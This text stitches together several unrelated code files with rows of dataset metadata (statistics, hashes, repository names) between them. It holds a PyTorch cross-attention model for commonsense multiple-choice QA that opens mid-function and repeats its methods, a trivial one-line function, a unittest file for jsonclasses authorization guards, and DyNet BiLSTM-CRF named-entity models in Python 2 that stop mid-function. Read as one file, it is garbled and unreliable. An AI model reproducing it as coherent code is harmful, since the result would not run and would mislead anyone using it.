input_ids = flat_input_ids,
attention_mask=flat_attention_mask,
token_type_ids=flat_token_type_ids
)
pooler_output = outputs.pooler_output # outputs[1] CLS token [5b, hidden]
last_hidden_state = outputs.last_hidden_state # outputs[0] [5b, seq_len, hidden]
# separate query and commonsense encoding
# [C] Q [S] QC [S] C [S] cs_1 [S] ←cs_seq_len cs2 ...[S]
cs_encoding, cs_padding_mask, qa_encoding, qa_padding_mask = self._pad_qacs_to_maxlen(flat_input_ids, last_hidden_state)
# import pdb; pdb.set_trace()
# cross-attn
# [5b, cs_len, query_seq_len, H]
qc_attn_output, qc_attn_weights = self.cross_att(qa_encoding, cs_encoding, cs_padding_mask)
# [5b, cs_len, cs_seq_len, H]
cq_attn_output, cq_attn_weights = self.cross_att(cs_encoding, qa_encoding, qa_padding_mask)
# [5b, cs_len, cs_seq_len, hidden] => [5b, cs_seq_len, hidden]
# [5b, cs_seq_len, hidden] => [5b, hidden]
cs_rep = self.cs_merge(cq_attn_output)
# cs_rep = torch.mean(cq_attoutput,dim = -3)
cs_rep = torch.mean(cs_rep, dim = -2)
# mean pooling query encoding
qu_rep = self.qu_merge(qc_attn_output)
# qu_rep = torch.mean(qc_attoutput, dim = -3)
qu_rep = torch.mean(qu_rep, dim = -2)
final_rep = torch.cat((pooler_output, cs_rep, qu_rep), dim=-1)
logits = self.scorer(final_rep).view(-1, 5)
return logits
def _pad_qacs_to_maxlen(self, flat_input_ids, last_hidden_state):
'''
input
- last_hidden_state [5B, seq_len, hidden]
return
- cs_range_list: [B*5, cs_num] (start, end) sep+1, sep
- qa_range_list: [B*5] (end)
- cs_encoding: [B*5, cs_num, max_cs_len, H]
- qa_encoding: [B*5, cs_num, max_qa_len, H]
- cs_attn_mask
- qa_attn_mask
'''
# Locate SEP token
input_ids = flat_input_ids.cpu().clone().detach().numpy()
sep_ids = input_ids == 3 # the SEP token id in ALBERT is 3
sep_locate = [[] for _ in range(len(sep_ids))] # [B*5, seq_num]
for index_1, case in enumerate(sep_ids):
for index_2, token in enumerate(case):
if token:
sep_locate[index_1].append(index_2)
# Get CS, QA range
cs_range_list = [[] for _ in range(len(sep_ids))] # [B*5, cs_num]
qa_range_list = []
for index, case in enumerate(sep_locate):
# Q [S] QC [S] Choice [S] cs_1[S] cs_2[S]
# qa: Q [S] QC [S] Choice [S]; cs: cs_1[S]
qa_range_list.append(case[2]+1)
start = case[2]
for end in case[3:]:
cs_tuple = (start+1, end+1)
start = end
cs_range_list[index].append(cs_tuple)
# Get CS and stack to tensor
hidden_size = last_hidden_state.shape[-1]
cs_batch_list, cs_padding_batch_list = [],[]
for index, case in enumerate(cs_range_list):
cs_case_list = []
cs_padding_list = []
for cs in case:
start, end = cs
pad_len = self.max_cs_len - (end-start)
cs = last_hidden_state[index, start:end, :]
zero = torch.zeros(pad_len, hidden_size, dtype=last_hidden_state.dtype)
zero = zero.to(last_hidden_state.device)
cs_case_list.append(torch.cat((cs, zero), dim=-2))
mask = torch.cat((torch.zeros(cs.shape[:-1]), torch.ones(pad_len))).bool()
mask = mask.to(last_hidden_state.device)
cs_padding_list.append(mask)
cs_batch_list.append(torch.stack(cs_case_list))
cs_padding_batch_list.append(torch.stack(cs_padding_list))
cs_encoding = torch.stack(cs_batch_list)
cs_padding_mask = torch.stack(cs_padding_batch_list)
# Get QA and stack to tensor
qa_batch_list, qa_padding_batch_list = [], []
for index, case in enumerate(qa_range_list):
end = case
pad_len = self.max_qa_len - (end-1)
qa = last_hidden_state[index, 1:end, :] # from after [CLS] up to the third [SEP]; [CLS] itself is excluded
zero = torch.zeros(pad_len, hidden_size, dtype=last_hidden_state.dtype)
zero = zero.to(last_hidden_state.device)
qa_batch_list.append(torch.cat((qa, zero), dim=-2))
mask = torch.cat((torch.zeros(qa.shape[:-1]), torch.ones(pad_len))).bool()
mask = mask.to(last_hidden_state.device)
qa_padding_batch_list.append(mask)
qa_encoding = torch.stack(qa_batch_list)
qa_encoding = qa_encoding.unsqueeze(1).expand(-1, self.cs_num, -1, -1)
qa_padding_mask = torch.stack(qa_padding_batch_list)
qa_padding_mask = qa_padding_mask.unsqueeze(1).expand(-1, self.cs_num, -1)
return cs_encoding, cs_padding_mask, qa_encoding, qa_padding_mask
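# Worked mini-example of the SEP-splitting logic above (illustrative numbers,
# not from the original file): if a row's [SEP] positions are [4, 8, 12, 18, 25],
# then qa_range_list gets case[2] + 1 = 13 (tokens 1..12, i.e. everything after
# [CLS] up to and including the third [SEP]), and cs_range_list gets the pairs
# (13, 19) and (19, 26), so each commonsense span ends just past its own [SEP].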
class BertCrossAttn(BertPreTrainedModel):
'''
input_ids [b, 5, seq_len] => [5b, seq_len]
=> PTM
cs_encoding [5b, cs_len, cs_seq_len, hidden]
query_encoding [5b, query_len, hidden] => [5b, cs_len, query_len, hidden]
=> cross_attn
qc_attoutput [5b, cs_len, query_seq_len, hidden]
cq_attoutput [5b, cs_len, cs_seq_len, hidden]
'''
def __init__(self, config, **kwargs):
super(BertCrossAttn, self).__init__(config)
# length config
self.cs_num = kwargs['cs_num']
self.max_cs_len = kwargs['max_cs_len']
self.max_qa_len = kwargs['max_qa_len']
# modules
self.bert = BertModel(config)
self.cross_att = AttentionLayer(config.hidden_size, self.cs_num)
self.cs_merge = AttentionMerge(config.hidden_size, config.hidden_size//2)
self.qu_merge = AttentionMerge(config.hidden_size, config.hidden_size//2)
self.scorer = nn.Sequential(
nn.Dropout(0.1),
nn.Linear(config.hidden_size * 3, 1)
)
self.init_weights()
def forward(self, input_ids, attention_mask, token_type_ids, labels):
logits = self._forward(input_ids, attention_mask, token_type_ids)
loss = F.cross_entropy(logits, labels)
with torch.no_grad():
logits = F.softmax(logits, dim=1)
predicts = torch.argmax(logits, dim=1)
right_num = torch.sum(predicts == labels)
return loss, right_num
def _forward(self, input_ids=None, attention_mask=None, token_type_ids=None):
# [B, 5, L] => [B * 5, L]
flat_input_ids = input_ids.view(-1, input_ids.size(-1))
flat_attention_mask = attention_mask.view(-1, attention_mask.size(-1))
flat_token_type_ids = token_type_ids.view(-1, token_type_ids.size(-1))
outputs = self.bert(
input_ids = flat_input_ids,
attention_mask=flat_attention_mask,
token_type_ids=flat_token_type_ids
)
pooler_output = outputs.pooler_output # outputs[1] CLS token [5b, hidden]
last_hidden_state = outputs.last_hidden_state # outputs[0] [5b, seq_len, hidden]
# separate query and commonsense encoding
# [C] Q [S] QC [S] C [S] cs_1 [S] ←cs_seq_len cs2 ...[S]
cs_encoding, cs_padding_mask, qa_encoding, qa_padding_mask = self._pad_qacs_to_maxlen(flat_input_ids, last_hidden_state)
# import pdb; pdb.set_trace()
# cross-attn
# [5b, cs_len, query_seq_len, H]
qc_attn_output, qc_attn_weights = self.cross_att(qa_encoding, cs_encoding, cs_padding_mask)
# [5b, cs_len, cs_seq_len, H]
cq_attn_output, cq_attn_weights = self.cross_att(cs_encoding, qa_encoding, qa_padding_mask)
# [5b, cs_len, cs_seq_len, hidden] => [5b, cs_seq_len, hidden]
# [5b, cs_seq_len, hidden] => [5b, hidden]
cs_rep = self.cs_merge(cq_attn_output)
# cs_rep = torch.mean(cq_attoutput,dim = -3)
cs_rep = torch.mean(cs_rep, dim = -2)
# mean pooling query encoding
qu_rep = self.qu_merge(qc_attn_output)
# qu_rep = torch.mean(qc_attoutput, dim = -3)
qu_rep = torch.mean(qu_rep, dim = -2)
final_rep = torch.cat((pooler_output, cs_rep, qu_rep), dim=-1)
logits = self.scorer(final_rep).view(-1, 5)
return logits
def _pad_qacs_to_maxlen(self, flat_input_ids, last_hidden_state):
'''
input
- last_hidden_state [5B, seq_len, hidden]
return
- cs_range_list: [B*5, cs_num] (start, end) sep+1, sep
- qa_range_list: [B*5] (end)
- cs_encoding: [B*5, cs_num, max_cs_len, H]
- qa_encoding: [B*5, cs_num, max_qa_len, H]
- cs_attn_mask
- qa_attn_mask
'''
# Locate SEP token
input_ids = flat_input_ids.cpu().clone().detach().numpy()
sep_ids = input_ids == 102 # the SEP token id in BERT is 102
sep_locate = [[] for _ in range(len(sep_ids))] # [B*5, seq_num]
for index_1, case in enumerate(sep_ids):
for index_2, token in enumerate(case):
if token:
sep_locate[index_1].append(index_2)
# Get CS, QA range
cs_range_list = [[] for _ in range(len(sep_ids))] # [B*5, cs_num]
qa_range_list = []
for index, case in enumerate(sep_locate):
# Q [S] QC [S] Choice [S] cs_1[S] cs_2[S]
# qa: Q [S] QC [S] Choice [S]; cs: cs_1[S]
qa_range_list.append(case[2]+1)
start = case[2]
for end in case[3:]:
cs_tuple = (start+1, end+1)
start = end
cs_range_list[index].append(cs_tuple)
# Get CS and stack to tensor
hidden_size = last_hidden_state.shape[-1]
cs_batch_list, cs_padding_batch_list = [],[]
for index, case in enumerate(cs_range_list):
cs_case_list = []
cs_padding_list = []
for cs in case:
start, end = cs
pad_len = self.max_cs_len - (end-start)
cs = last_hidden_state[index, start:end, :]
zero = torch.zeros(pad_len, hidden_size, dtype=last_hidden_state.dtype)
zero = zero.to(last_hidden_state.device)
cs_case_list.append(torch.cat((cs, zero), dim=-2))
mask = torch.cat((torch.zeros(cs.shape[:-1]), torch.ones(pad_len))).bool()
mask = mask.to(last_hidden_state.device)
cs_padding_list.append(mask)
cs_batch_list.append(torch.stack(cs_case_list))
cs_padding_batch_list.append(torch.stack(cs_padding_list))
cs_encoding = torch.stack(cs_batch_list)
cs_padding_mask = torch.stack(cs_padding_batch_list)
# Get QA and stack to tensor
qa_batch_list, qa_padding_batch_list = [], []
for index, case in enumerate(qa_range_list):
end = case
pad_len = self.max_qa_len - (end-1)
qa = last_hidden_state[index, 1:end, :] # from after [CLS] up to the third [SEP]; [CLS] itself is excluded
zero = torch.zeros(pad_len, hidden_size, dtype=last_hidden_state.dtype)
zero = zero.to(last_hidden_state.device)
qa_batch_list.append(torch.cat((qa, zero), dim=-2))
mask = torch.cat((torch.zeros(qa.shape[:-1]), torch.ones(pad_len))).bool()
mask = mask.to(last_hidden_state.device)
qa_padding_batch_list.append(mask)
qa_encoding = torch.stack(qa_batch_list)
qa_encoding = qa_encoding.unsqueeze(1).expand(-1, self.cs_num, -1, -1)
qa_padding_mask = torch.stack(qa_padding_batch_list)
qa_padding_mask = qa_padding_mask.unsqueeze(1).expand(-1, self.cs_num, -1)
return cs_encoding, cs_padding_mask, qa_encoding, qa_padding_mask
class AttentionMerge(nn.Module):
def __init__(self, input_size, attention_size, dropout_prob=0.1):
super(AttentionMerge, self).__init__()
self.attention_size = attention_size
self.hidden_layer = nn.Linear(input_size, self.attention_size)
self.query_ = nn.Parameter(torch.Tensor(self.attention_size, 1))
self.dropout = nn.Dropout(dropout_prob)
self.query_.data.normal_(mean=0.0, std=0.02)
def forward(self, values, mask=None):
"""
H (B, L, hidden_size) => h (B, hidden_size)
(B, L1, L2, hidden_size) => (B, L2, hidden)
"""
if mask is None:
mask = torch.zeros_like(values)
# mask = mask.data.normal_(mean=0.0, std=0.02)
else:
mask = (1 - mask.unsqueeze(-1).type(torch.float)) * -1000.
# values [batch*5, len, hidden] => keys [B, L, atten_size]
keys = self.hidden_layer(values)
keys = torch.tanh(keys)
query_var = torch.var(self.query_) # variance
# (b, l, atten_size) @ (h, 1) -> (b, l, 1)
attention_probs = keys @ self.query_ / math.sqrt(self.attention_size * query_var)
# attention_probs = keys @ self.query_ / math.sqrt(self.attention_size)
attention_probs = F.softmax(attention_probs + mask, dim=1) # additive mask; [batch*5, len, 1]
attention_probs = self.dropout(attention_probs)
context = torch.sum(attention_probs * values, dim=1) # attention-weighted sum; [batch*5, hidden]
return context
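# Shape sketch for AttentionMerge (hypothetical sizes, not from the original file):
#   merge = AttentionMerge(input_size=768, attention_size=192)
#   h = torch.randn(4, 30, 768)   # (B, L, hidden_size)
#   merge(h).shape                # -> torch.Size([4, 768])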
class AttentionLayer(nn.Module):
def __init__(self, hidden_size, cs_num):
super().__init__()
self.hidden_size = hidden_size
self.cs_num = cs_num
self.mult_attn = nn.MultiheadAttention(self.hidden_size, num_heads=1)
def forward(self, query, keyvalue, attn_mask):
'''
input:
- query: [b, cs_num, Lq, hidden]
- keyvalue: [b, cs_num, Lkv, hidden]
output:
- attn_output_weights: [B, cs_num, Lq, Lkv]
- attn_output: [B, cs_num, Lq, H]
'''
q_origin_shape = query.shape
# [B, cs_num, L, H] -> [B * cs_num, L, H] -> [L, B*cs_num, H]
query = query.contiguous().view(-1, query.size(-2), query.size(-1))
query = query.transpose(0, 1)
keyvalue = keyvalue.contiguous().view(-1, keyvalue.size(-2), keyvalue.size(-1))
keyvalue = keyvalue.transpose(0, 1)
# [B, cs_num, L] -> [B*cs_num, L]
attn_mask = attn_mask.contiguous().view(-1, attn_mask.size(-1))
# [Lq, B*cs_num, H], [B*cs_num, Lq, Ls]
attn_output, attn_output_weights = self.mult_attn(query, keyvalue, keyvalue, key_padding_mask=attn_mask)
# [Lq, B*cs_num, H] -> [B*cs_num, Lq, H] -> [B, cs_num, Lq, H]
attn_output = attn_output.transpose(0, 1)
attn_output = attn_output.view(q_origin_shape)
attn_output_weights = attn_output_weights.view(q_origin_shape[0], self.cs_num, -1)
return attn_output, attn_output_weights
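# Shape sketch for AttentionLayer (hypothetical sizes, not from the original file):
#   attn = AttentionLayer(hidden_size=768, cs_num=4)
#   q   = torch.randn(2, 4, 10, 768)              # [B, cs_num, Lq, H]
#   kv  = torch.randn(2, 4, 24, 768)              # [B, cs_num, Lkv, H]
#   pad = torch.zeros(2, 4, 24, dtype=torch.bool) # nothing masked out
#   out, w = attn(q, kv, pad)                     # out: [2, 4, 10, 768]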
| 40.522459
| 128
| 0.606849
| 2,431
| 17,141
| 3.966269
| 0.082271
| 0.018668
| 0.043559
| 0.01452
| 0.816013
| 0.800249
| 0.799212
| 0.799212
| 0.794648
| 0.791122
| 0
| 0.017111
| 0.273788
| 17,141
| 422
| 129
| 40.618483
| 0.75731
| 0.204947
| 0
| 0.731092
| 0
| 0
| 0.003942
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05042
| false
| 0
| 0.02521
| 0
| 0.12605
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
553b9ade543749cef72141f9ef1f9bb625cf8b71
| 34
|
py
|
Python
|
document retrieval/proj.py
|
amudalab/concept-graphs
|
59748671dd510bfb6fd1098c99aac048f93e9821
|
[
"MIT"
] | 1
|
2021-02-15T02:09:32.000Z
|
2021-02-15T02:09:32.000Z
|
document retrieval/proj.py
|
amudalab/concept-graphs
|
59748671dd510bfb6fd1098c99aac048f93e9821
|
[
"MIT"
] | null | null | null |
document retrieval/proj.py
|
amudalab/concept-graphs
|
59748671dd510bfb6fd1098c99aac048f93e9821
|
[
"MIT"
] | 4
|
2017-03-07T12:01:58.000Z
|
2019-02-28T10:03:57.000Z
|
def rt(ip):
return [10, 15, 20]
| 17
| 21
| 0.558824
| 7
| 34
| 2.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.230769
| 0.235294
| 34
| 2
| 21
| 17
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
553b9d245b6070cfef5282c636ae6947a045b267
| 3,033
|
py
|
Python
|
tests/test_can_create.py
|
Jesse-Yung/jsonclasses
|
d40c52aec42bcb978a80ceb98b93ab38134dc790
|
[
"MIT"
] | 50
|
2021-08-18T08:08:04.000Z
|
2022-03-20T07:23:26.000Z
|
tests/test_can_create.py
|
Jesse-Yung/jsonclasses
|
d40c52aec42bcb978a80ceb98b93ab38134dc790
|
[
"MIT"
] | 1
|
2021-11-23T02:12:29.000Z
|
2021-11-23T13:35:26.000Z
|
tests/test_can_create.py
|
Jesse-Yung/jsonclasses
|
d40c52aec42bcb978a80ceb98b93ab38134dc790
|
[
"MIT"
] | 8
|
2021-07-01T02:39:15.000Z
|
2021-12-10T02:20:18.000Z
|
from __future__ import annotations
from unittest import TestCase
from jsonclasses.excs import UnauthorizedActionException
from tests.classes.gs_article import GSArticle, GSAuthor, GSTArticle
from tests.classes.gm_article import GMArticle, GMAuthor
class TestCanCreate(TestCase):
def test_guards_raises_if_no_operator_is_assigned(self):
article = GSArticle(name='P', content='C')
paid_author = GSAuthor(id='P', name='A', paid_user=True)
article.author = paid_author
with self.assertRaises(UnauthorizedActionException):
article.save()
def test_guards_are_called_for_new_objects_on_save(self):
article = GSArticle(name='P', content='C')
paid_author = GSAuthor(id='P', name='A', paid_user=True)
article.author = paid_author
article.opby(paid_author)
article.save()
free_author = GSAuthor(id='F', name='A', paid_user=False)
article.author = free_author
article.opby(free_author)
with self.assertRaises(UnauthorizedActionException):
article.save()
def test_guards_are_not_called_for_existing_objects_on_save(self):
article = GSArticle(name='P', content='C')
setattr(article, '_is_new', False)
paid_author = GSAuthor(id='P', name='A', paid_user=True)
article.author = paid_author
article.opby(paid_author)
article.save()
free_author = GSAuthor(id='F', name='A', paid_user=False)
article.author = free_author
article.opby(free_author)
article.save()
def test_multiple_guards_are_called_for_new_objects_on_save(self):
article = GMArticle(name='P', content='C')
paid_author = GMAuthor(id='P', name='A', paid_user=True)
article.author = paid_author
article.opby(paid_author)
article.save()
free_author = GMAuthor(id='F', name='A', paid_user=False)
article.author = free_author
article.opby(free_author)
with self.assertRaises(UnauthorizedActionException):
article.save()
def test_multiple_guards_are_not_called_for_existing_objects_on_save(self):
article = GMArticle(name='P', content='C')
setattr(article, '_is_new', False)
paid_author = GMAuthor(id='P', name='A', paid_user=True)
article.author = paid_author
article.opby(paid_author)
article.save()
free_author = GMAuthor(id='F', name='A', paid_user=False)
article.author = free_author
article.opby(free_author)
article.save()
def test_types_guard_is_called_for_new_object_on_save(self):
article = GSTArticle(name='P', content='C')
paid_author = GSAuthor(id='P', name='P', paid_user=True)
article.opby(paid_author)
article.save()
free_author = GSAuthor(id='F', name='A', paid_user=False)
article.author = free_author
article.opby(free_author)
with self.assertRaises(UnauthorizedActionException):
article.save()
| 40.44
| 79
| 0.672601
| 377
| 3,033
| 5.135279
| 0.161804
| 0.082645
| 0.046488
| 0.067149
| 0.820248
| 0.820248
| 0.820248
| 0.811983
| 0.811983
| 0.811983
| 0
| 0
| 0.217936
| 3,033
| 74
| 80
| 40.986486
| 0.816189
| 0
| 0
| 0.787879
| 0
| 0
| 0.015826
| 0
| 0
| 0
| 0
| 0
| 0.060606
| 1
| 0.090909
| false
| 0
| 0.075758
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
55491370d800764563ab7ca0e1c5823338e0f27b
| 27,182
|
py
|
Python
|
models/model_builder.py
|
neulab/cmu-ner
|
d35d57fe453d81cc98e3ee55bac58f9ca618f59b
|
[
"BSD-3-Clause"
] | 11
|
2018-04-21T10:25:12.000Z
|
2022-03-27T03:48:25.000Z
|
models/model_builder.py
|
neulab/cmu-ner
|
d35d57fe453d81cc98e3ee55bac58f9ca618f59b
|
[
"BSD-3-Clause"
] | 2
|
2018-06-29T11:02:18.000Z
|
2018-06-29T11:15:24.000Z
|
models/model_builder.py
|
neulab/cmu-ner
|
d35d57fe453d81cc98e3ee55bac58f9ca618f59b
|
[
"BSD-3-Clause"
] | null | null | null |
__author__ = 'chuntingzhou'
from encoders import *
from decoders import *
np.set_printoptions(threshold=np.inf)
class CRF_Model(object):
def __init__(self, args, data_loader):
self.save_to = args.save_to_path
self.load_from = args.load_from_path
tag_to_id = data_loader.tag_to_id
if args.isLr:
self.constraints = [[[tag_to_id["B-GPE"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-PER"], tag_to_id["I-LOC"]]],
[[tag_to_id["B-ORG"]] * 3, [tag_to_id["I-GPE"], tag_to_id["I-PER"], tag_to_id["I-LOC"]]],
[[tag_to_id["B-PER"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-GPE"], tag_to_id["I-LOC"]]],
[[tag_to_id["B-LOC"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-PER"], tag_to_id["I-GPE"]]],
[[tag_to_id["O"]] * 4, [tag_to_id["I-ORG"], tag_to_id["I-PER"], tag_to_id["I-LOC"], tag_to_id["I-GPE"]]],
[[tag_to_id["I-GPE"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-PER"], tag_to_id["I-LOC"]]],
[[tag_to_id["I-ORG"]] * 3, [tag_to_id["I-GPE"], tag_to_id["I-PER"], tag_to_id["I-LOC"]]],
[[tag_to_id["I-PER"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-GPE"], tag_to_id["I-LOC"]]],
[[tag_to_id["I-LOC"]] * 3, [tag_to_id["I-ORG"], tag_to_id["I-PER"], tag_to_id["I-GPE"]]]]
else:
self.constraints = None
# print self.constraints
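# Reading of the constraint format above (an interpretation; the exact
# semantics are defined by chain_CRF_decoder, which is not shown here):
# each pair [[from_tag] * k, [to_tag_1, ..., to_tag_k]] lists k transitions
# (from_tag -> to_tag_i) that the CRF should treat as disallowed, e.g.
# B-GPE may not be followed by I-ORG, I-PER, or I-LOC.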
def forward(self, sents, char_sents, feats, bc_feats, training=True):
raise NotImplementedError
def save(self):
if self.save_to is not None:
self.model.save(self.save_to)
else:
print('Save to path not provided!')
def load(self, path=None):
if path is None:
path = self.load_from
if self.load_from is not None or path is not None:
print('Load model parameters from %s!' % path)
self.model.populate(path)
else:
print('Load from path not provided!')
def cal_loss(self, sents, char_sents, ner_tags, feats, bc_feats, training=True):
birnn_outputs = self.forward(sents, char_sents, feats, bc_feats, training=training)
crf_loss = self.crf_decoder.decode_loss(birnn_outputs, ner_tags)
return crf_loss  # , sum_s, sent_s
def eval(self, sents, char_sents, feats, bc_feats, training=False):
birnn_outputs = self.forward(sents, char_sents, feats, bc_feats, training=training)
best_score, best_path = self.crf_decoder.decoding(birnn_outputs)
return best_score, best_path
def eval_scores(self, sents, char_sents, feats, bc_feats, training=False):
birnn_outputs = self.forward(sents, char_sents, feats, bc_feats, training=training)
tag_scores, transit_score = self.crf_decoder.get_crf_scores(birnn_outputs)
return tag_scores, transit_score
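# Usage sketch for the CRF_Model interface (hypothetical; `args` and
# `data_loader` come from a training script that is not part of this file):
#   model = vanilla_NER_CRF_model(args, data_loader)
#   loss = model.cal_loss(sents, char_sents, ner_tags, feats, bc_feats)
#   best_score, best_path = model.eval(sents, char_sents, feats, bc_feats)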
class vanilla_NER_CRF_model(CRF_Model):
''' Implement End-to-end Sequence Labeling via Bi-directional LSTM-CNNs-CRF. '''
def __init__(self, args, data_loader):
super(vanilla_NER_CRF_model, self).__init__(args, data_loader)
self.model = dy.Model()
self.args = args
ner_tag_size = data_loader.ner_vocab_size
char_vocab_size = data_loader.char_vocab_size
word_vocab_size = data_loader.word_vocab_size
word_padding_token = data_loader.word_padding_token
char_emb_dim = args.char_emb_dim
word_emb_dim = args.word_emb_dim
tag_emb_dim = args.tag_emb_dim
if args.map_pretrain:
birnn_input_dim = args.cnn_filter_size + args.map_dim
else:
birnn_input_dim = args.cnn_filter_size + args.word_emb_dim
hidden_dim = args.hidden_dim
src_ctx_dim = args.hidden_dim * 2
cnn_filter_size = args.cnn_filter_size
cnn_win_size = args.cnn_win_size
output_dropout_rate = args.output_dropout_rate
emb_dropout_rate = args.emb_dropout_rate
if args.use_discrete_features:
self.num_feats = data_loader.num_feats
self.feature_encoder = Discrete_Feature_Encoder(self.model, self.num_feats, args.feature_dim)
birnn_input_dim += args.feature_dim * self.num_feats
if args.use_brown_cluster:
bc_num = args.brown_cluster_num
bc_dim = args.brown_cluster_dim
# within a batch all input sequences have the same length, so we don't have to bother with padding
self.bc_encoder = Lookup_Encoder(self.model, args, bc_num, bc_dim, word_padding_token, isFeatureEmb=True)
birnn_input_dim += bc_dim
self.char_cnn_encoder = CNN_Encoder(self.model, char_emb_dim, cnn_win_size, cnn_filter_size,
0.0, char_vocab_size, data_loader.char_padding_token)
if args.pretrain_emb_path is None:
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token)
else:
print "In NER CRF: Using pretrained word embedding!"
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token, data_loader.pretrain_word_emb)
# print data_loader.word_to_id
# for i in range(len(data_loader.word_to_id)):
# print i, data_loader.id_to_word[i]
# print data_loader.pretrain_word_emb
# print "*************************************"
# for i in range(len(data_loader.word_to_id)):
# print self.word_lookup.lookup_table[i].npvalue()
# raw_input()
self.birnn_encoder = BiRNN_Encoder(self.model, birnn_input_dim, hidden_dim, emb_dropout_rate=emb_dropout_rate,
output_dropout_rate=output_dropout_rate)
# self.crf_decoder = classifier(self.model, src_ctx_dim, ner_tag_size)
self.crf_decoder = chain_CRF_decoder(args, self.model, src_ctx_dim, tag_emb_dim, ner_tag_size, constraints=self.constraints)
def forward(self, sents, char_sents, feats, bc_feats, training=True):
char_embs = self.char_cnn_encoder.encode(char_sents, training=training)
word_embs = self.word_lookup.encode(sents)
if self.args.use_discrete_features:
feat_embs = self.feature_encoder.encode(feats)
if self.args.use_brown_cluster:
bc_feat_embs = self.bc_encoder.encode(bc_feats)
if self.args.use_discrete_features and self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([c, w, f, b]) for c, w, f, b in
zip(char_embs, word_embs, feat_embs, bc_feat_embs)]
elif self.args.use_brown_cluster and not self.args.use_discrete_features:
concat_inputs = [dy.concatenate([c, w, f]) for c, w, f in
zip(char_embs, word_embs, bc_feat_embs)]
elif self.args.use_discrete_features and not self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([c, w, f]) for c, w, f in
zip(char_embs, word_embs, feat_embs)]
else:
concat_inputs = [dy.concatenate([c, w]) for c, w in zip(char_embs, word_embs)]
birnn_outputs = self.birnn_encoder.encode(concat_inputs, training=training)
return birnn_outputs
class BiRNN_CRF_model(CRF_Model):
''' The same as above, except that the CNN layer for characters is replaced with a BiRNN layer. '''
def __init__(self, args, data_loader):
self.model = dy.Model()
self.args = args
super(BiRNN_CRF_model, self).__init__(args, data_loader)
ner_tag_size = data_loader.ner_vocab_size
char_vocab_size = data_loader.char_vocab_size
word_vocab_size = data_loader.word_vocab_size
word_padding_token = data_loader.word_padding_token
char_emb_dim = args.char_emb_dim
word_emb_dim = args.word_emb_dim
tag_emb_dim = args.tag_emb_dim
if args.map_pretrain:
birnn_input_dim = args.char_hidden_dim * 2 + args.map_dim
else:
birnn_input_dim = args.char_hidden_dim * 2 + args.word_emb_dim
hidden_dim = args.hidden_dim
char_hidden_dim = args.char_hidden_dim
src_ctx_dim = args.hidden_dim * 2
output_dropout_rate = args.output_dropout_rate
emb_dropout_rate = args.emb_dropout_rate
if args.use_discrete_features:
self.num_feats = data_loader.num_feats
self.feature_encoder = Discrete_Feature_Encoder(self.model, self.num_feats, args.feature_dim)
birnn_input_dim += args.feature_dim * self.num_feats
if args.use_brown_cluster:
bc_num = args.brown_cluster_num
bc_dim = args.brown_cluster_dim
# within a batch all input sequences have the same length, so we don't have to bother with padding
self.bc_encoder = Lookup_Encoder(self.model, args, bc_num, bc_dim, word_padding_token, isFeatureEmb=True)
birnn_input_dim += bc_dim
self.char_birnn_encoder = BiRNN_Encoder(self.model,
char_emb_dim,
char_hidden_dim,
emb_dropout_rate=0.0,
output_dropout_rate=0.0,
vocab_size=char_vocab_size,
emb_size=char_emb_dim)
if args.pretrain_emb_path is None:
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token)
else:
print "In NER CRF: Using pretrained word embedding!"
self.word_lookup = Lookup_Encoder(self.model, args, word_vocab_size, word_emb_dim, word_padding_token, data_loader.pretrain_word_emb)
self.birnn_encoder = BiRNN_Encoder(self.model,
birnn_input_dim,
hidden_dim,
emb_dropout_rate=emb_dropout_rate,
output_dropout_rate=output_dropout_rate)
# self.crf_decoder = classifier(self.model, src_ctx_dim, ner_tag_size)
self.crf_decoder = chain_CRF_decoder(args, self.model, src_ctx_dim, tag_emb_dim, ner_tag_size, constraints=self.constraints)
def forward(self, sents, char_sents, feats, bc_feats, training=True):
char_embs = self.char_birnn_encoder.encode(char_sents, training=training, char=True)
word_embs = self.word_lookup.encode(sents)
if self.args.use_discrete_features:
feat_embs = self.feature_encoder.encode(feats)
if self.args.use_brown_cluster:
bc_feat_embs = self.bc_encoder.encode(bc_feats)
if self.args.use_discrete_features and self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([c, w, f, b]) for c, w, f, b in
zip(char_embs, word_embs, feat_embs, bc_feat_embs)]
elif self.args.use_brown_cluster and not self.args.use_discrete_features:
concat_inputs = [dy.concatenate([c, w, f]) for c, w, f in
zip(char_embs, word_embs, bc_feat_embs)]
elif self.args.use_discrete_features and not self.args.use_brown_cluster:
concat_inputs = [dy.concatenate([c, w, f]) for c, w, f in
zip(char_embs, word_embs, feat_embs)]
else:
